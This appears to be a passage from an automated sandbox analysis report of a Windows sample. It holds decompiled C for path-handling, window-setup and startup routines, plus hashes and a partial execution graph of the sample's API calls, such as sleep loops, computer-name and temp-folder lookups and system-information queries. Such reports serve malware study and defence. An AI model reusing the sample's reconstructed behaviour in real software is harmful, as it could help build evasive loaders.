                                              						if(_v16 == 0) {
                                              							goto L32;
                                              						} else {
                                              							if(_v24 == 0) {
                                              								goto L26;
                                              							}
                                              							_v20 = 4;
                                              							_t182 = E00762A67(_t196, _t190, _a8, _t217,  &_a16,  &_v12, 0);
                                              							goto L25;
                                              						}
                                              					} else {
                                              						_push(0);
                                              						_push( &_v12);
                                              						_push( &_a16);
                                              						if(_v16 == 0) {
                                              							_push(L"\\\\");
                                              						} else {
                                              							_v20 = 6;
                                              							_push(L"\\\\?\\UNC\\");
                                              						}
                                              						_push(_t216);
                                              						_push(_t190);
                                              						_t182 = E00762A67(_t195);
                                              						_t214 = _v24;
                                              						L25:
                                              						_v8 = _t182;
                                              						L26:
                                              						if(_v16 != 0) {
                                              							_t175 = _v20;
                                              							if(_t175 != 0 && _a8 <= _t175 + 0x104) {
                                              								if(_a8 > 0x104) {
                                              									_a8 = 0x104;
                                              								}
                                              								_t214 = _a12;
                                              								_v20 = _v20 & 0x00000000;
                                              								_v12 = _a8;
                                              								_a16 = _t190;
                                              								_v8 = E00761AE1(_t190, _a8, E00761460);
                                              							}
                                              						}
                                              						L32:
                                              						if(_v8 < 0) {
                                              							L79:
                                              							E00761AE1(_t190, _a8, E00761460);
                                              							_t121 = _v8;
                                              							if(_t121 != 0x8007007a) {
                                              								goto L113;
                                              							}
                                              							if(_v16 != 0) {
                                              								L83:
                                              								if(_a8 != 0x8000) {
                                              									goto L113;
                                              								}
                                              								L84:
                                              								return 0x800700ce;
                                              							}
                                              							if(_a8 == 0x104) {
                                              								goto L84;
                                              							}
                                              							if(_v16 == 0) {
                                              								goto L113;
                                              							}
                                              							goto L83;
                                              						}
                                              						while( *_t214 != 0) {
                                              							_t156 = wcschr(_t214, 0x5c);
                                              							_pop(_t203);
                                              							_a12 = _t156;
                                              							if(_t156 == 0) {
                                              								_t157 = _t214;
                                              								_t211 =  &(_t157[0]);
                                              								do {
                                              									_t203 =  *_t157;
                                              									_t157 =  &(_t157[0]);
                                              								} while (_t203 != 0);
                                              								_t221 = _t157 - _t211 >> 1;
                                              								L39:
                                              								if(_t221 <= 0x100 || _v16 != 0) {
                                              									if(_t221 >= 0x8000) {
                                              										goto L76;
                                              									}
                                              									if(_t221 != 1) {
                                              										if(_t221 != 2) {
                                              											if(_t221 == 0 &&  *_t214 == 0x5c) {
                                              												_t221 = _t221 + 1;
                                              											}
                                              											L63:
                                              											_t163 = E00762B88(_t203, _a16, _v12, _t214, _t221,  &_a16,  &_v12, 0);
                                              											_v8 = _t163;
                                              											if(_t163 != 0x8007007a || _t221 != 1 ||  *_t214 != 0x5c) {
                                              												L73:
                                              												_t214 = _t214 + _t221 * 2;
                                              												L74:
                                              												if(_v8 < 0) {
                                              													break;
                                              												}
                                              												continue;
                                              											} else {
                                              												_t164 = _t214[0] & 0x0000ffff;
                                              												if(_t164 == 0 || _t164 == 0x2e && _t214[1] == 0) {
                                              													_v8 = 0;
                                              													break;
                                              												} else {
                                              													if(_v12 == 1 && _t164 == 0x2e && _t214[1] == _t164) {
                                              														_a16 = _a16 + 2;
                                              														 *_a16 = 0;
                                              														_v12 = 0;
                                              														_v8 = 0;
                                              													}
                                              													goto L73;
                                              												}
                                              											}
                                              										}
                                              										if( *_t214 != 0x2e || _t214[0] != 0x2e) {
                                              											goto L63;
                                              										} else {
                                              											if(_a16 <= _t190 || E00762DA5(_t190) != 0) {
                                              												_t166 = _a12;
                                              												if(_t166 != 0) {
                                              													L45:
                                              													_t214 =  &(_t166[0]);
                                              													goto L74;
                                              												}
                                              												goto L59;
                                              											} else {
                                              												_t170 = E0076286E(_t190, _a16 + 0xfffffffe);
                                              												_a16 = _t170;
                                              												_t171 = _a8;
                                              												if(_t170 == 0) {
                                              													_a16 = _t190;
                                              												} else {
                                              													_t171 = _t171 - (_a16 - _t190 >> 1);
                                              												}
                                              												_v12 = _t171;
                                              												_v8 = E00761AE1(_a16, _t171, E00761460);
                                              												L59:
                                              												_t214 =  &(_t214[1]);
                                              												goto L74;
                                              											}
                                              										}
                                              									}
                                              									if( *_t214 != 0x2e) {
                                              										goto L63;
                                              									}
                                              									_t166 = _a12;
                                              									if(_t166 == 0) {
                                              										_t214 =  &(_t214[0]);
                                              										if(_a16 > _t190 && E00762DA5(_t190) == 0) {
                                              											_a16 = _a16 - 2;
                                              											_v12 = _v12 + 1;
                                              											_v8 = E00761AE1(_a16, _v12, E00761460);
                                              										}
                                              										goto L74;
                                              									}
                                              									goto L45;
                                              								} else {
                                              									L76:
                                              									_v8 = 0x800700ce;
                                              									goto L79;
                                              								}
                                              							}
                                              							_t221 = _t156 - _t214 >> 1;
                                              							goto L39;
                                              						}
                                              						if(_v8 >= 0) {
                                              							_t197 = _a16;
                                              							if(_t197 <= _t190) {
                                              								L92:
                                              								_t131 = _t190;
                                              								_t208 = _t131 + 2;
                                              								do {
                                              									_t198 =  *_t131;
                                              									_t131 = _t131 + 2;
                                              								} while (_t198 != 0);
                                              								_t218 = _t190 + (_t131 - _t208 >> 1) * 2;
                                              								if(_t218 >= _t190 + 0xe) {
                                              									_t220 = _t218 - 0xe;
                                              									if(E00762815(_t220, L"::$DATA", 7) != 0) {
                                              										 *_t220 = 0;
                                              									}
                                              								}
                                              								_t136 = _v20;
                                              								if(_t136 == 0) {
                                              									L105:
                                              									if(_a8 > 1 &&  *_t190 == 0) {
                                              										_t140 = 0x5c;
                                              										 *_t190 = _t140;
                                              										 *((short*)(_t190 + 2)) = 0;
                                              									}
                                              									if(_a8 > 3 &&  *((short*)(_t190 + 2)) == 0x3a &&  *((intOrPtr*)(_t190 + 4)) == 0) {
                                              										_t138 = 0x5c;
                                              										 *((short*)(_t190 + 4)) = _t138;
                                              										 *((short*)(_t190 + 6)) = 0;
                                              									}
                                              									return 0;
                                              								} else {
                                              									_t142 = _t190 + _t136 * 2;
                                              									_t209 = _t142 + 2;
                                              									do {
                                              										_t199 =  *_t142;
                                              										_t142 = _t142 + 2;
                                              									} while (_t199 != 0);
                                              									if(_t142 - _t209 >> 1 < 0x104) {
                                              										if(_v28 == 0) {
                                              											_push(_t190 + 8);
                                              											_push(_a8);
                                              											_push(_t190);
                                              										} else {
                                              											_push(_t190 + 0x10);
                                              											_push(_a8 + 0xfffffffe);
                                              											_push(_t190 + 4);
                                              										}
                                              										E00761AE1();
                                              									}
                                              									goto L105;
                                              								}
                                              							}
                                              							_t201 = _t197;
                                              							if( *_t201 != 0x2e) {
                                              								goto L92;
                                              							}
                                              							while(_t201 != _t190) {
                                              								_t155 = _t201 - 2;
                                              								if( *_t155 == 0x2a) {
                                              									goto L92;
                                              								}
                                              								 *_t201 = 0;
                                              								_t201 = _t155;
                                              								if( *_t155 != 0x2e) {
                                              									goto L92;
                                              								}
                                              							}
                                              							 *_t201 = 0;
                                              							goto L92;
                                              						}
                                              						goto L79;
                                              					}
                                              				}
                                              			}

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: wcschr
                                              • String ID: ::$DATA$\\?\$\\?\UNC\
                                              • API String ID: 1497570035-1379090233
                                              • Opcode ID: 02bd72f5a06e988ea3f8d3300d1c8a1f13748dc1ac81312eae509b73460745d4
                                              • Instruction ID: 0a82863888dcd261f5774c49bf756bd9816a52195c6f55551fd893e8728a24f4
                                              • Opcode Fuzzy Hash: 02bd72f5a06e988ea3f8d3300d1c8a1f13748dc1ac81312eae509b73460745d4
                                              • Instruction Fuzzy Hash: 64E1607190024AEACF21DF64C844AAEBBB4FF05354F54812AEC17AB181E77C9F90CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00762FD3(void* __ebx, wchar_t* _a4, signed int* _a8) {
                                              				signed int* _t16;
                                              				int _t19;
                                              				int _t20;
                                              				int _t22;
                                              				signed short* _t25;
                                              				wchar_t* _t27;
                                              				intOrPtr* _t32;
                                              				wchar_t* _t37;
                                              				wchar_t* _t39;
                                              				int _t43;
                                              				int _t46;
                                              				long* _t47;
                                              				void* _t48;
                                              				void* _t49;
                                              				intOrPtr* _t50;
                                              				signed short* _t51;
                                              				signed short* _t52;
                                              
                                              				_t51 = _a4;
                                              				if(_t51 == 0 ||  *_t51 == 0) {
                                              					L28:
                                              					return 0x80070057;
                                              				} else {
                                              					_t16 = _a8;
                                              					if(_t16 == 0) {
                                              						goto L28;
                                              					}
                                              					 *_t16 =  *_t16 & 0x00000000;
                                              					if(E00762D2E(_t51,  &_a4) == 0) {
                                              						_t49 = 0x5c;
                                              						__eflags =  *_t51 - _t49;
                                              						if(__eflags != 0) {
                                              							L19:
                                              							_t19 = E00762963(__eflags, _t51);
                                              							__eflags = _t19;
                                              							if(_t19 == 0) {
                                              								_t20 = E00762815(_t51, L"\\\\?\\", 4);
                                              								__eflags = _t20;
                                              								if(_t20 != 0) {
                                              									_t51 =  &(_t51[4]);
                                              									__eflags = _t51;
                                              								}
                                              								_t22 = iswalpha( *_t51 & 0x0000ffff);
                                              								__eflags = _t22;
                                              								if(_t22 == 0) {
                                              									goto L28;
                                              								} else {
                                              									__eflags = _t51[1] - 0x3a;
                                              									if(_t51[1] != 0x3a) {
                                              										goto L28;
                                              									}
                                              									_t52 =  &(_t51[2]);
                                              									__eflags = _t52;
                                              									L26:
                                              									__eflags =  *_t52 - _t49;
                                              									if( *_t52 == _t49) {
                                              										_t52 =  &(_t52[1]);
                                              									}
                                              									L9:
                                              									 *_a8 = _t52;
                                              									return 0;
                                              								}
                                              							}
                                              							_t52 =  &(_t51[0x30]);
                                              							goto L26;
                                              						}
                                              						_t25 =  &(_t51[1]);
                                              						__eflags =  *_t25 - _t49;
                                              						if(__eflags == 0) {
                                              							goto L19;
                                              						}
                                              						_t52 = _t25;
                                              						goto L9;
                                              					}
                                              					_t37 = _a4;
                                              					_t50 = wcschr(_t37, 0x5c);
                                              					if(_t50 == 0) {
                                              						_t27 = _t37;
                                              						_t47 =  &(_t27[0]);
                                              						do {
                                              							_t43 =  *_t27;
                                              							_t27 =  &(_t27[0]);
                                              							__eflags = _t43;
                                              						} while (_t43 != 0);
                                              						_t52 = _t37 + (_t27 - _t47 >> 1) * 2;
                                              						L8:
                                              						goto L9;
                                              					}
                                              					_t5 = _t50 + 2; // 0x2
                                              					_t39 = _t5;
                                              					_t52 = wcschr(_t39, 0x5c);
                                              					if(_t52 == 0) {
                                              						_t32 = _t50;
                                              						_t7 = _t32 + 2; // 0x2
                                              						_t48 = _t7;
                                              						do {
                                              							_t46 =  *_t32;
                                              							_t32 = _t32 + 2;
                                              							__eflags = _t46;
                                              						} while (_t46 != 0);
                                              						_t52 = _t50 + (_t32 - _t48 >> 1) * 2;
                                              					} else {
                                              						if(_t52 != _t39) {
                                              							_t52 =  &(_t52[1]);
                                              						}
                                              					}
                                              					goto L8;
                                              				}
                                              			}

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: wcschr$iswalpha
                                              • String ID: \\?\
                                              • API String ID: 934781262-4282027825
                                              • Opcode ID: 52e3167332966b1e652e2cfddb16ca6973188133fce8cd4af4152dcc586112d1
                                              • Instruction ID: f9f0f52bb96a282e1bef18b48eaf07490bd1f7f0683819d82f3a2c765733a113
                                              • Opcode Fuzzy Hash: 52e3167332966b1e652e2cfddb16ca6973188133fce8cd4af4152dcc586112d1
                                              • Instruction Fuzzy Hash: 6F31E73AA00616E7E7259E58CC44AA773AAEB057A0B154016ED47DB180EB7CDF4DC7E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E007613B9(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                              				struct _WNDCLASSW _v44;
                                              				struct HICON__* _t17;
                                              				WCHAR* _t22;
                                              				signed int _t23;
                                              				struct HINSTANCE__* _t27;
                                              
                                              				_t23 = 9;
                                              				_v44.style = 0;
                                              				memset( &(_v44.lpfnWndProc), 0, _t23 << 2);
                                              				_t27 = _a4;
                                              				_v44.lpfnWndProc = E0076119B;
                                              				_v44.hInstance = _t27;
                                              				_v44.hIcon = LoadIconW(_t27, 0x64);
                                              				_t17 = LoadCursorW(0, 0x7f00);
                                              				_t22 = _a8;
                                              				_v44.hCursor = _t17;
                                              				_v44.hbrBackground = 6;
                                              				_v44.cbWndExtra = 4;
                                              				_v44.lpszClassName = _t22;
                                              				RegisterClassW( &_v44);
                                              				return CreateWindowExW(0x80, _t22, E00761460, 0, 0x80000000, 0x80000000, 0, 0, 0, 0, _t27, 0);
                                              			}

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Load$ClassCreateCursorIconRegisterWindow
                                              • String ID:
                                              • API String ID: 1446224504-0
                                              • Opcode ID: 34a04263806a684ea14649ca9d911f1a62f21b449a313e6c32e62bc6b5ca3dca
                                              • Instruction ID: 0b2902c7c2bb2d155a7532998f75a84c2d494c958d637b8cffaa93a71d669bf9
                                              • Opcode Fuzzy Hash: 34a04263806a684ea14649ca9d911f1a62f21b449a313e6c32e62bc6b5ca3dca
                                              • Instruction Fuzzy Hash: 790169B2901219BFDB108F969C4DEDFBFBCEB49760F148016FA06A6240D6B85940CBF4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00761C9C() {
                                              				signed int _t10;
                                              				void* _t15;
                                              				intOrPtr _t18;
                                              				intOrPtr* _t19;
                                              				signed int _t25;
                                              				signed int _t26;
                                              				void* _t28;
                                              				intOrPtr _t32;
                                              
                                              				_t28 =  *0x760000 - 0x5a4d; // 0x5a4d
                                              				if(_t28 != 0) {
                                              					L8:
                                              					_t10 = 0;
                                              				} else {
                                              					_t18 =  *0x76003c; // 0xd8
                                              					_t1 = _t18 + 0x760000; // 0x4550
                                              					_t19 = _t1;
                                              					if( *_t19 != 0x4550) {
                                              						goto L8;
                                              					} else {
                                              						_t25 =  *(_t19 + 0x18) & 0x0000ffff;
                                              						if(_t25 != 0x10b) {
                                              							if(_t25 != 0x20b ||  *((intOrPtr*)(_t19 + 0x84)) <= 0xe) {
                                              								goto L8;
                                              							} else {
                                              								_t26 = 0;
                                              								goto L5;
                                              							}
                                              						} else {
                                              							if( *((intOrPtr*)(_t19 + 0x74)) <= 0xe) {
                                              								goto L8;
                                              							} else {
                                              								_t26 = 0;
                                              								_t32 =  *((intOrPtr*)(_t19 + 0xe8));
                                              								L5:
                                              								_t10 = _t26 & 0xffffff00 | _t32 != 0x00000000;
                                              							}
                                              						}
                                              					}
                                              				}
                                              				 *0x765050 = _t10;
                                              				__set_app_type(E00761D5E(2));
                                              				 *0x76505c =  *0x76505c | 0xffffffff;
                                              				 *0x765060 =  *0x765060 | 0xffffffff;
                                              				 *(__p__fmode()) =  *0x7653ac;
                                              				 *(__p__commode()) =  *0x7653a8;
                                              				_t15 = E0076158B();
                                              				if( *0x76539c == 0) {
                                              					__setusermatherr(E0076158B);
                                              				}
                                              				E00761D46(_t15);
                                              				return 0;
                                              			}

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: __p__commode__p__fmode__set_app_type
                                              • String ID:
                                              • API String ID: 3338496922-0
                                              • Opcode ID: 4d2bc0ac04215885bb50df246d60a41bfddda2fba59500700d3f7b32b801f216
                                              • Instruction ID: b77e2fb812ae2c6d009712799a461b08af99ab35d7a775817da716b7d2e5344d
                                              • Opcode Fuzzy Hash: 4d2bc0ac04215885bb50df246d60a41bfddda2fba59500700d3f7b32b801f216
                                              • Instruction Fuzzy Hash: BF1133B0605705CFC7285B30D85D66837A0FB02711F99C67AE957866F1D7BC8880DF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00762DA5(signed short* _a4) {
                                              				long _t12;
                                              				int _t13;
                                              				signed short* _t15;
                                              				signed short* _t17;
                                              				signed int _t24;
                                              				signed short* _t30;
                                              				void* _t32;
                                              				void* _t33;
                                              				signed short* _t34;
                                              
                                              				_t34 = _a4;
                                              				if(_t34 == 0) {
                                              					L21:
                                              					__eflags = 0;
                                              					return 0;
                                              				}
                                              				_t12 =  *_t34 & 0x0000ffff;
                                              				if(_t12 == 0) {
                                              					goto L21;
                                              				}
                                              				_t13 = iswalpha(_t12);
                                              				_t33 = E00762E84;
                                              				if(_t13 == 0 || E00762815( &(_t34[1]), E00762E84, 3) == 0) {
                                              					__eflags =  *_t34 - 0x5c;
                                              					if( *_t34 != 0x5c) {
                                              						L7:
                                              						_t15 = E00762D2E(_t34,  &_a4);
                                              						__eflags = _t15;
                                              						if(_t15 == 0) {
                                              							__eflags = E00762815(_t34, L"\\\\?\\", 4);
                                              							if(__eflags == 0) {
                                              								L18:
                                              								_t17 = E00762963(__eflags, _t34);
                                              								__eflags = _t17;
                                              								if(_t17 == 0) {
                                              									goto L21;
                                              								}
                                              								__eflags = _t34[0x30] - 0x5c;
                                              								if(_t34[0x30] != 0x5c) {
                                              									goto L21;
                                              								}
                                              								__eflags = _t34[0x31];
                                              								if(_t34[0x31] == 0) {
                                              									goto L4;
                                              								}
                                              								goto L21;
                                              							}
                                              							__eflags = iswalpha(_t34[4] & 0x0000ffff);
                                              							if(__eflags == 0) {
                                              								goto L18;
                                              							}
                                              							__eflags = E00762815( &(_t34[5]), _t33, 3);
                                              							if(__eflags != 0) {
                                              								goto L4;
                                              							}
                                              							goto L18;
                                              						}
                                              						_t30 = _a4;
                                              						_t32 = 0;
                                              						while(1) {
                                              							_t24 =  *_t30 & 0x0000ffff;
                                              							__eflags = _t24;
                                              							if(_t24 == 0) {
                                              								goto L4;
                                              							}
                                              							__eflags = _t24 - 0x5c;
                                              							if(_t24 != 0x5c) {
                                              								L12:
                                              								_t30 =  &(_t30[1]);
                                              								__eflags = _t30;
                                              								continue;
                                              							}
                                              							_t32 = _t32 + 1;
                                              							__eflags = _t32 - 1;
                                              							if(_t32 > 1) {
                                              								goto L21;
                                              							}
                                              							__eflags = _t30[1];
                                              							if(_t30[1] == 0) {
                                              								goto L21;
                                              							}
                                              							goto L12;
                                              						}
                                              						goto L4;
                                              					}
                                              					__eflags = _t34[1];
                                              					if(_t34[1] == 0) {
                                              						goto L4;
                                              					}
                                              					goto L7;
                                              				} else {
                                              					L4:
                                              					return 1;
                                              				}
                                              			}
                                              0x00762dac
                                              0x00762db2
                                              0x00762e79
                                              0x00762e79
                                              0x00000000
                                              0x00762e79
                                              0x00762db8
                                              0x00762dbe
                                              0x00000000
                                              0x00000000
                                              0x00762dcb
                                              0x00762dce
                                              0x00762dd5
                                              0x00762def
                                              0x00762df3
                                              0x00762dfc
                                              0x00762e01
                                              0x00762e06
                                              0x00762e08
                                              0x00762e3d
                                              0x00762e3f
                                              0x00762e5d
                                              0x00762e5e
                                              0x00762e63
                                              0x00762e65
                                              0x00000000
                                              0x00000000
                                              0x00762e67
                                              0x00762e6c
                                              0x00000000
                                              0x00000000
                                              0x00762e6e
                                              0x00762e73
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00762e73
                                              0x00762e49
                                              0x00762e4b
                                              0x00000000
                                              0x00000000
                                              0x00762e59
                                              0x00762e5b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00762e5b
                                              0x00762e0a
                                              0x00762e0d
                                              0x00762e26
                                              0x00762e26
                                              0x00762e29
                                              0x00762e2c
                                              0x00000000
                                              0x00000000
                                              0x00762e11
                                              0x00762e15
                                              0x00762e24
                                              0x00762e25
                                              0x00762e25
                                              0x00000000
                                              0x00762e25
                                              0x00762e17
                                              0x00762e18
                                              0x00762e1b
                                              0x00000000
                                              0x00000000
                                              0x00762e1d
                                              0x00762e22
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00762e22
                                              0x00000000
                                              0x00762e26
                                              0x00762df5
                                              0x00762dfa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00762de7
                                              0x00762de7
                                              0x00000000
                                              0x00762de9

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: iswalpha
                                              • String ID: \\?\
                                              • API String ID: 2011389249-4282027825
                                              • Opcode ID: 4cce5e3bb56fbb70c76a56fedf99cd492c8c4b7cc48340c4975287173622b8fd
                                              • Instruction ID: d0c68ca84d9a20b2a15682f3cc12c6b721a4ace713d158a67eb143b1870c206a
                                              • Opcode Fuzzy Hash: 4cce5e3bb56fbb70c76a56fedf99cd492c8c4b7cc48340c4975287173622b8fd
                                              • Instruction Fuzzy Hash: 0421F535600F02A5EAB46665DC4CAB732ECAF44790B14843EED83D6087E72DC883C164
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E00761467(void* __ecx, void* _a4) {
                                              				char _v8;
                                              				intOrPtr _t17;
                                              				signed int _t18;
                                              				intOrPtr _t29;
                                              
                                              				_t17 =  *[fs:0x18];
                                              				_t29 =  *((intOrPtr*)(_t17 + 0x30));
                                              				RtlImageNtHeader(_a4);
                                              				if( *((short*)(_t17 + 0x14)) != 0 &&  *(_t17 + 0x4c) != 0) {
                                              					 *(_t29 + 0xa4) =  *(_t17 + 0x4c) & 0x000000ff;
                                              					 *(_t29 + 0xa8) =  *(_t17 + 0x4d) & 0x000000ff;
                                              					 *(_t29 + 0xac) =  *(_t17 + 0x4e) & 0x00003fff;
                                              					 *(_t29 + 0xb0) = ( *(_t17 + 0x4c) ^ 0xbfffffff) >> 0x1e;
                                              				}
                                              				_t18 =  &_v8;
                                              				__imp__ImageDirectoryEntryToData( *((intOrPtr*)(_t29 + 8)), 1, 0xa, _t18);
                                              				if(_t18 != 0) {
                                              					_t18 =  *(_t18 + 0x34) & 0x0000ffff;
                                              					if(_t18 != 0) {
                                              						 *(_t29 + 0xae) = _t18;
                                              					}
                                              				}
                                              				return _t18;
                                              			}
                                              0x0076146d
                                              0x00761477
                                              0x0076147a
                                              0x00761485
                                              0x007623b7
                                              0x007623c1
                                              0x007623d3
                                              0x007623e5
                                              0x007623e5
                                              0x00761491
                                              0x0076149c
                                              0x007614a4
                                              0x007614a6
                                              0x007614ad
                                              0x007623f0
                                              0x007623f0
                                              0x007614ad
                                              0x007614b5

                                              APIs
                                              • RtlImageNtHeader.NTDLL(?), ref: 0076147A
                                              • ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,00000001,?,?,007612FF,00000001,?,?,?,00000001,?,?,00000000,?), ref: 0076149C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.944577749.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true
                                              • Associated: 00000004.00000002.944574407.0000000000760000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000004.00000002.944581994.0000000000766000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_760000_r9093.jbxd
                                              Similarity
                                              • API ID: Image$DataDirectoryEntryHeader
                                              • String ID: )G`v
                                              • API String ID: 3478907836-1429216067
                                              • Opcode ID: ee4aeb5c61fe1cf313c1e3b53e7667abacc247d1472f07ff0a8fbc81d1b24393
                                              • Instruction ID: 97d60d10e6d64c9b022b2a45c84c22176cb1d29796a400d5d8e5afc65d603815
                                              • Opcode Fuzzy Hash: ee4aeb5c61fe1cf313c1e3b53e7667abacc247d1472f07ff0a8fbc81d1b24393
                                              • Instruction Fuzzy Hash: 1B01D270124794EFC7208F22D404BE37BB4EF05710F494499EA978B2A1E778D940CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:4.5%
                                              Dynamic/Decrypted Code Coverage:82.2%
                                              Signature Coverage:39.1%
                                              Total number of Nodes:230
                                              Total number of Limit Nodes:19
                                              execution_graph 6630 180002aa4 6633 180002174 6630->6633 6634 180002190 SleepEx 6633->6634 6634->6634 6635 1800021b4 wsprintfW 6634->6635 6636 1800021d1 6635->6636 6650 180002860 GetProcessHeap RtlAllocateHeap 6636->6650 6639 1800021e5 6665 180001d80 wsprintfW 6639->6665 6640 18000224e 6645 180002232 6686 180001b5c GetProcessHeap HeapAlloc 6645->6686 6646 18000221e GetProcessHeap HeapFree 6646->6645 6651 1800028a1 wsprintfW wsprintfW 6650->6651 6652 1800021e0 6650->6652 6745 180001484 GetTickCount64 6651->6745 6652->6639 6652->6640 6654 1800028e7 wsprintfW 6696 18000108c 6654->6696 6658 18000292f 6717 1800027b4 6658->6717 6660 18000293b 6720 180002018 GetComputerNameExW 6660->6720 6664 180002956 6664->6652 6670 180001db5 6665->6670 6667 180001e2e 6668 180001e33 GetProcessHeap HeapFree 6667->6668 6669 180001e27 6667->6669 6668->6669 6669->6640 6674 180001198 6669->6674 6670->6667 6670->6669 6671 180001e1a Sleep 6670->6671 6672 180001e06 GetProcessHeap HeapFree 6670->6672 6777 180001b08 6670->6777 6780 180001760 6670->6780 6671->6670 6672->6671 6675 1800011a9 6674->6675 6685 180001211 6674->6685 6675->6685 6809 180001688 SHGetFolderPathA 6675->6809 6678 1800011cb GetLastError 6678->6685 6679 1800011dc 6814 180001000 GetTempPathA 6679->6814 6682 1800011ed GetLastError 6682->6685 6683 1800011ff 6821 180002268 6683->6821 6685->6645 6685->6646 6687 180001bc2 6686->6687 6688 180001b92 6686->6688 6687->6640 6691 180002480 wsprintfW 6687->6691 6689 1800014b4 6 API calls 6688->6689 6690 180001ba4 wsprintfW 6689->6690 6690->6687 6692 180001b08 19 API calls 6691->6692 6693 1800024ca 6692->6693 6694 1800024f0 6693->6694 6695 1800024dc GetProcessHeap HeapFree 6693->6695 6694->6640 6695->6694 6707 1800010a3 6696->6707 6697 1800010a8 LoadLibraryA GetProcAddress 6698 1800010cd NtQuerySystemInformation 6697->6698 6700 180001135 6697->6700 6699 180001131 6698->6699 6698->6707 6699->6700 6702 18000116b 6699->6702 6706 18000112f wsprintfW 
